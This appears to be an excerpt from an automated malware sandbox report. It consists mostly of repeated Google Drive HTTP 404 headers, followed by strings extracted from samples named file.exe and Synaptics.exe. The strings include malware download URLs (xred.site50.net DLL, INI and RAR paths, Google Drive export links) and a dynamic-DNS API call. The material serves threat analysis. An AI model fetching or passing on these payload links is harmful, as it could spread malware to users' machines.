UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7DJkL_1k3p9Jm9qH6m00ifJonYXKMufLFJzyLhGnxw3s0cn8SmP-0OE54o9Lo-j9swContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-A7lWMEU92VvuEHglevTTKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6HsKnWIfQvgEru7jQGgM419bNZ9E47e_kTVmr-mH-78XMyxclOxJymO9H7x6EFVgiEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:04 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-k1w-qb6td-dd__bLLo89-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4BwuyeDri6hDV9YS8efASC0S144CcwJ314_3rhW9XjjGcUlOWiftmxM43p3h7n_FJgiadv5f8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:05 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-Uthj4jhh8rAQIfy2DwZ4NQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7jZa1BfZmaTC5U-tAJGwGlgQaWY8DergKbINa8kjWUJiXvE803Ugx1Od6ugeazz7aabIfXW5UContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:05 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-i1Bum3kP3wuV_e2eRmaSag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6elcOMJZf7ETZffwtj9wZrkwrp9j_eOAAu8mNnfuBkDuuqPj8axttKT8N4_P6pK7IrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-OHCt6I374bH0sb6puiQDKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59YiJkwpSSoN_DgMY1p74RRrKNpPG42CIsSGPx0q4uNd41PRYN11qDBuxgU7ZKbGyCxjztYQwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:07 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-GTHoLr2DcQnulqwmmfWh8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4FGPAjsNOT0cgQ36GABnFN4Kt5iNZ4MnNxEzA-kpg9xENbPVCnMOJ_xtuPNX0-gFnEsdWVFOoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nxYGPefF9XjUiNOiikIOqA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7nyXUb0SbfzjgHWduGvSMJduuMXP99rPFMCsrFzQ87TDkufKe_vfeTDUv8tQnGDCSsPQbxllQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:09 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-arbLrr7Vv2NVz8WtzwCFKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4dyq9hPdSeWPthq8c3kwqvA1LoQkljYy2lhY3QjAN5KvpdK0aB0TwZE0a51As6gQv1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Fur3sQMLSZAZiyBftdHbvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7uufi-CuuSG2IT7wLak9LKJJWmSm-91fpdC4KXJFw3XMayJ_ox2MWl7zYcZNyeiWNyVZkJtO8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:11 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-9zZK_44E4xkYScADtjQXmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC64Xg5NVph1lDOLsZ_pznUCyOciwqzYz2Tlr_vK5SYko2JDgdeQbB83grcTehrQU-tfiYBEsusContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-5zp8a64Bmyh5nnK7psQqdw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4TyRTccBECYo2TD1GYGzwyu-Jl0hf5FmlwLivFKFPtG3z96yqZd6ZwLcSOykGyo7QFkbo0HGUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:12 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-6hwCT0PAm03me-gpj7T7BA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4cVAvrhCVJu55K_LZr3qAV0YlaXtPYhN8tJXMGHWQEYIf8C_2X5eurI8rXvXjWdJn_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:14 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-qxExPVE64mQdi6e0M4cDIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6y52_J0jto88mfOP07SpBorMSx1Iu_RDgiHwG736P_p_Lr4Vc1LAAbmIr2nXBlA_S7MBlAk7YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LWn_vLWcPapakJmlyJ8Aeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5bB4cwJJfe-zqJSSDcZj7kt5LhGAehDGVkDYGqHRz9Y7n4H8zlRMcaPx1_YJedz7LKhfBUvpoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:15 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-AW6cSHoVMoEIqGun_04Mow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7xKUOk0nJXOphPRu7dzIBUJ-Q0a3Msq588wKhooxEGr57G068vetaXUp32qyyVRWMJDzCw9zwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:28 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ILNwGMRXRCHWf-1L2_WxlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5tdblVPX4kA1Ls_N8du8MzppwbFX_erEd8RXdFo281VTW-KFBnjsidPMeNCysXn1OIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 02 Jan 2025 19:30:28 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-n865IQqdIM3DNS5Dsma64g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.000000000057A000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniH)k
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                              Source: Synaptics.exe, 00000003.00000002.1980458813.0000000000591000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2014101336.000000000EA0A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                              Source: Synaptics.exe, 00000003.00000002.2033802566.000000001A93E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2004023076.000000000ACBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2027067816.00000000156BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
